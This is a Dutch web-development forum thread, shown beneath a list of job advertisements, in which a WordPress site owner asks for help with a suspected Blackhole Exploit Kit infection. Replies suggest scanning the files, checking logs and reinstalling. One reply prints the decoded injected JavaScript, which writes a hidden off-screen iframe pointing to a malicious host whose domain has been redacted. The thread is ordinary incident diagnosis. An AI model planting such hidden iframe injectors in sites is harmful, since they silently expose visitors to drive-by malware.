Blackhole Exploit Kit

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Fullstack developer (NodeJS, React, AWS)

Functie Als Fullstack developer kom je te werken in het ontwikkelteam, maar zoals gezegd komt er veel meer bij kijken dan alleen maar ontwikkelen. Je bent samen met je collega’s continu bezig om de software uit te breiden maar hiernaast doe je doorlopend onderzoek naar de inzet van bijvoorbeeld Machine Learning. Ze willen met hun software echt voorlopen op andere en toegevoegde waarde leveren voor de eindgebruiker. Mede hierom zijn ze erg benieuwd naar iemand zijn persoonlijkheid, of hij graag nieuwe dingen uitzoekt (Google!), en initiatief neemt. Maar waar staan ze nu? Na een onderzoeksfase van ruim een jaar zijn

Bekijk vacature »

Front end developer

Functie Qua type opdrachten is er echt een verscheidenheid aan afnemers, zo werken ze met grote multinationals, maar ook met startups. Zo kom je te werken in een gevarieerde omgeving en kan je ook schakelen tussen verschillende culturen. De projecten variëren van greenfield projecten tot langdurige ontwikkeltrajecten. Hier wordt alleen maar gewerkt met aan front end projecten. Daarom maakt het onze partner niet uit waar jij kennis van hebt, als je maar gedegen kennis hebt van Javascript frameworks, Unit testing en ook bekend bent met de scrum methodiek. Eisen Minimaal 4 jaar relevante werkervaring Kennen en ervaring van Javascript frameworks

Bekijk vacature »

Back-End Web Developer

As a Back-End Web Developer at Coolblue, you ensure that our webshops work as optimal as possible. How do I become a Back-End Web Developer at Coolblue? As a Back-End Web Developer you work together with other development teams to make our webshop work as optimal as possible and to make our customers happy. Although you are a PHP Developer, you also feel confident with setting up microservices in Typescript or are open to learning this. Would you also like to become a PHP Developer at Coolblue? Read below if the job suits you. You enjoy doing this Writing pure

Bekijk vacature »

Anaplan Developer

Dit ga je doen What are you going to do: Picking up Stories: Design planning had, how are we going to build it in Anaplan; Talking to the end user to build a forecasting model; Having contact with the data team about which data is needed; Being able to convert an Excel sheet into a 3, 4 or 5 dimensional modeling environment; Giving knowledge sessions about Anaplan; Solving incidents; Making instructional videos on how teams should read forecasts; Writing blogs about forecasting. Hier ga je werken We are looking for an Anaplan Builder to deliver end-to-end solutions within a big

Bekijk vacature »

Belastingdienst - Freelance Senior Cobol Applicati

Startdatum: 01.06.2023 Richttarief: €65,00 - €75,00 Duur van de opdracht: 7 maanden Uren per week: 36 Taal: Nederlands vereist! Gelieve in het Nederlands te solliciteren. Functieomschrijving: In de applicatie ETM zijn nu de inningsvoorzieningen voor ongeveer 25 aangifte- en aanslagmiddelen opgenomen. ETM is een extern aangeschafte service en het huidige contract met leverancier Oracle loopt af op 31-12-2022. Het programma uitfaseren ETM heeft als doel om vervanging te realiseren waarmee alle nu in gebruik zijnde ETM ondersteuning wordt overgenomen in nieuwe Inningsvoorzieningen om de continuïteit van de inningsprocessen te waarborgen. Eén van de inningsvoorzieningen die voor het einde van 31-12-2022

Bekijk vacature »

PHP Developer Symfony

Dit ga je doen Ontwikkelen van Product Informatie Management (PIM) systemen; Werken aan zowel grotere als kleine projecten voor toonaangevende klanten binnen o.a. de retail. Hier ga je werken Als PHP Developer kom je te werken binnen een vooruitstrevende organisatie die Product Informatie Management (PIM) systemen levert aan hun klanten. Hun klanten zijn toonaangevende bedrijven binnen o.a. de retail. De organisatie zit gevestigd in regio Zwolle en bestaat uit zo'n 35 medewerkers, waarvan 30 IT. Je komt te werken binnen één van de zelfsturende development teams welke ieder verantwoordelijk zijn voor hun 'eigen' klanten. Jouw team bestaat uit 6 backend

Bekijk vacature »

Back-end programmeur

Functieomschrijving Heb jij recent jouw HBO ICT diploma in ontvangst mogen nemen? Of ben je toe aan een nieuwe uitdaging? Voor een erkende werkgever in regio Waalwijk zijn wij op zoek naar een back-end developer. Kennis of ervaring met C# & SQL is een must! Je houdt je bezig met het ontwikkelen van nieuwe functionaliteiten; Je bent verantwoordelijk voor de beheer en ontwikkeling van de software; Je draagt bij aan de implementatie van aanpassingen, verbeteringen en aanvullingen in de C# based applicaties; Je test de software en ontwikkelt deze door; Je brengt de aanpassingssuggesties van klanten in kaart, om ze

Bekijk vacature »

Senior .Net developer

Sogeti is een organisatie met een goede werksfeer en zo min mogelijk hiërarchische verhoudingen. Ga je bij ons als .Net Developer aan de slag? Dan werk je dagelijks met collega’s aan de mooiste IT-projecten. Deze snelgroeiende groep collega’s krijgt energie van hun vak en dat merk je op de werkvloer. Natuurlijk krijg jij de mogelijkheid je te certificeren. We organiseren regelmatig technische Meet-ups en doen we veel aan kennisdeling. Mede hierdoor zij wij dit jaar Microsoft Partner of the year geworden. Sogetisten staan klaar voor elkaar, hebben lol met elkaar en daarmee behalen we de mooiste resultaten! Werken bij Sogeti

Bekijk vacature »

Front-end developer E-Commere

Functie E-commerce is een ‘’snelle’’ wereld. Om hierin continu voorop te blijven omarmen ze in een vroeg stadium nieuwe technieken. Een webshop is nooit af en kan altijd beter, sneller en efficiënter. Tegelijkertijd hebben ze vanaf hun oprichting altijd vastgehouden aan kwaliteit boven snelheid, en dit loont. Als front-end developer heb je een adviserende rol en sta je aan het eindpunt van alles wat met designs te maken heeft. Je overlegt met klanten en collega’s, en zet je in om ideeen om te zetten tot unieke concepten. Je bent het aanspreekpunt voor de klant en bewaakt tevens de planning. Eisen

Bekijk vacature »

Senior Front-End Developer

Als Senior Front-End Developer bij Coolblue verbeter je de gebruiksvriendelijkheid van onze webshop voor miljoenen klanten. Wat doe je als Senior Front-End Developer bij Coolblue? Als Senior Front-end Developer werk je aan de gebruiksvriendelijkheid van onze webshop voor miljoenen klanten. Je vindt het leuk om samen te werken met de UX designer om stories op te pakken. Daarnaast ben je trots op je werk en verwelkomt alle feedback. Ook Senior Front-end Developer worden bij Coolblue? Lees hieronder of het bij je past. Dit vind je leuk om te doen Verbeteren van de gebruiksvriendelijkheid van onze webshop voor miljoenen klanten. Nadenken

Bekijk vacature »

Software developer (Python)

Functie Je komt te werken in het IT-team bestaande uit de Lead developer en 4 (medior/senior) developers. Gezamenlijk werken jullie aan de verbetering en uitbreiding van de software. Binnen het development team is er veel vrijheid en zelfstandigheid, zonder dat ze hiermee afdoen aan de kwaliteit. Zo hebben ze elke ochtend een korte stand-up (10:00 uur) en houden ze zo nu en dan pair-programming sessies. Ook is er een hele professionele ontwikkelcyclus waarbij code altijd eerst door een collega wordt getest voordat het naar deployement gaat. Je hebt in je werk oog voor kwaliteit, risico’s en het klantbelang. Communicatie met

Bekijk vacature »

Java/Kotlin Developer

Java/Kotlin Developer Ben jij een ervaren Java/Kotlin developer met een passie voor het automatiseren van bedrijfsprocessen? Wil je graag deelnemen aan uitdagende projecten bij aansprekende klanten? En ben je op zoek naar een professioneel, ambitieus en dynamisch bedrijf om je carrière verder te ontwikkelen? Kom dan ons team bij Ritense in Amsterdam versterken! Zo ziet de functie eruit: Als Java/Kotlin developer bij Ritense ben je verantwoordelijk voor de ontwikkeling en implementatie van applicaties die bedrijfsprocessen automatiseren, zodat onze klanten slimmer, efficiënter en klantgerichter kunnen werken. Als developer ben je in de lead en zorg je voor de correcte oplevering van

Bekijk vacature »

Android developer

De functie Schiphol is een plek om te reizen, te verblijven en te werken. Door middel van data en technologie richten we op al deze gebieden het leef- en werkklimaat optimaal in en zorgen we voor een slimmere en efficiëntere operatie. Wij ontwikkelen nieuwe producten en diensten vanuit de wensen en behoeften van onze klanten, voorspellen passagier flows en testen digitale oplossingen om rijen en andere pijnpunten in het proces te verminderen. Met slimme feedback van sensortechnologie maken we zelfs data van toiletten en stoelen inzichtelijk en bruikbaar. Het Commercial Platform bestaat uit multidisciplinaire teams met een end-2-end verantwoordelijkheid voor

Bekijk vacature »

Software Developer Mendix / Maatschappelijk Betrok

Dit ga je doen Het bouwen van de Mendix applicaties in samenwerking met jouw team of zelfstandig; Werken met Scrum methodiek; Ontwikkelen van vooruitstrevende oplossingen; Meedenken over nieuwe applicaties en ontwikkelingen; On the job eigen maken van de Mendix omgeving. Hier ga je werken Deze dynamische en snelgroeiende organisatie begeeft zich in de recyclingbranche. Zij nemen op duurzame en efficiënte manier de recycling op zich. Vanwege hun snelle groei zijn zij op zoek naar een young professional die zich graag wilt ontwikkelen als Mendix Developer. Je komt te werken binnen een IT team van +/- 15 medewerkers. Het huidige ‘vaste’

Bekijk vacature »

Full stack ontwikkelaar Laravel, Vue.js

Functie Als ontwikkelaar binnen deze organisatie hou jij je voornamelijk met lopende projecten voor de verschillende klanten. Zo bouw je de ene dag aan prijsschifting systemen en de andere dag onderzoek je crawlers en stel je ze zo in dat de data goed binnen komt binnen het systeem. Daarnaast bouw je mee aan dashboards en ben je dus constant bezig met het verbeteren van het platform. Er is een vaste werkwijze, zo werken ze met Trello kaarten en onderverdelen ze deze aan het begin van iedere week onder de developers. Dit wordt door de lead developer gedaan, maar in samenspraak

Bekijk vacature »
Brainworx CC

Brainworx CC

14/03/2013 11:56:02
Quote Anchor link
Beste,

Ik heb denk ik last van een Blackhole Exploit Kit op mijn website.

Configuratie:
- WP 3.5.1
- Up2date plugins
- Premium theme *betaald

Ik heb diverse malen de .php bestanden doorzocht op een code die wijst naar een mogelijke oorzaak. Helaas zonder resultaat. Ik krijg zelf (en sommige bezoekers) met diverse antivirus guards zo nu en dan meldingen, van eem mogelijke dreiging.

Sucuri: OK?

web site: *url verwijderd ivm veiligheid*
status: Verified Clean
web trust: Not Blacklisted
*Cached results from a few minutes ago.

Security report (No threats found):
check Blacklisted: No
check Malware: No
check Malicious javascript: No
check Malicious iFrames: No
check Drive-By Downloads: No
check Anomaly detection: No
check IE-only attacks: No
check Suspicious redirections: No
check Spam: No

AVG: NOK?

*url verwijderd ivm veiligheid*

Kan iemand mij hierbij helpen informeren. Heb reeds de SQL en WP installatie eenmaal volledig opnieuw geinstalleerd. Dus waar dit precies ontstaat is mij geheel onduidelijk. Wellich in een file op de ftp dat geen .php is?
Gewijzigd op 24/05/2013 14:21:44 door Bas IJzelendoorn

PHP hulp

PHP hulp

27/05/2026 13:29:27

TJVB tvb

TJVB tvb

14/03/2013 12:00:53
Quote Anchor link
Heb je alle bestanden gedownload (via ftp) en met een virusscanner gescand?

Marvin H

Marvin H

14/03/2013 12:02:39
Quote Anchor link
Het zou ook kunnen zijn dat de hosting provider zelf is gehacked, zit je op shared hosting?
Controleer eens op bestanden die recentelijk gewijzigd zijn en check je logboeken op rare events (indien je hier toegang tot hebt)...

Toevoeging op 14/03/2013 12:07:58:

Ik zie trouwens in je broncode een raar script staan, het ziet ernaar uit dat je php files zijn aangepast...
Ik kan je wel helpen met alles te checken, stuur me anders even een PM

code verwijderd om exploit te voorkomen
Gewijzigd op 24/05/2013 15:19:03 door Joren de Wit

Brainworx CC

Brainworx CC

14/03/2013 12:10:44
Quote Anchor link
@TJVB, done en geen gevonden object.

@Marvin, die 1e line zie ik zelf nergens staan :S ik PM je even!

Marvin H

Marvin H

14/03/2013 12:14:12
Quote Anchor link
Bovenstaande 'hash' is de volgende HTML code... Duidelijk een injectie in je PHP dus...

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
        if (document.getElementsByTagName('body')[0]){
            iframer();
        } else {
            document.write("<iframe src='http://.....biz/tmpfile/node/questions.php?topnav=42&soft=633&oracle=79&virus=719&contests=730' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
        }
        function iframer(){
            var f = document.createElement('iframe');f.setAttribute('src','http://......biz/tmpfile/node/questions.php?topnav=42&soft=633&oracle=79&virus=719&contests=730');f.style.left='-10000px';f.style.visibility='hidden';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
            document.getElementsByTagName('body')[0].appendChild(f);
        }
Gewijzigd op 24/05/2013 15:16:02 door Joren de Wit

Brainworx CC

Brainworx CC

24/05/2013 11:59:31
Quote Anchor link
Mensen,

Ik heb echt even hulp nodig nu... heb er diverse malen nu naar gekeken, maar alsnog geeft hij weer meldingen.

http://imgur.com/ucekepZ

Iemand die de broncode in WP kan na kijken voor me?

Bas IJzelendoorn

Bas IJzelendoorn

24/05/2013 15:25:56
Quote Anchor link
Voor de zekerheid heb ik 2 urls en gevaarlijke code verwijderd. Gezien hier bij mij me virusscanner en de spyware scanner begonnen te protesteren bij het openen van de pagina (op phphulp). Graag het verzoek even goed opletten met welke code er geplaatst wordt en geen gevaarlijke code hier te plaatsen.[/modedit]

Brainworx CC

Brainworx CC

24/05/2013 15:41:48
Quote Anchor link
Maar Bas ... is er ook iemand die mij kan helpen?

TJVB tvb

TJVB tvb

24/05/2013 15:50:17
Quote Anchor link
Heb je alles (ook verborgen bestanden) weggehaald en Word Press geheel opnieuw geïnstalleerd?
Alle wachtwoorden aangepast?
En heb je ook de access logs na kunnen kijken?

Eventueel wil ik er wel naar kijken (pm me dan de details) maar dat zal pas volgende week gebeuren.

Eddy E

Eddy E

24/05/2013 21:06:40
Quote Anchor link
Inderdaad, buiten WP om even een backup van je database maken (via PHPmyAdmin oid).
Dan alles verwijderen, WP nieuw erop zetten (van schone installatie) en dan database terug zetten.

Is misschien de enige manier.
En uiteraard dit aangeven bij WP, zodat ze het gat kunnen dichten.

Overzicht Reageren

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.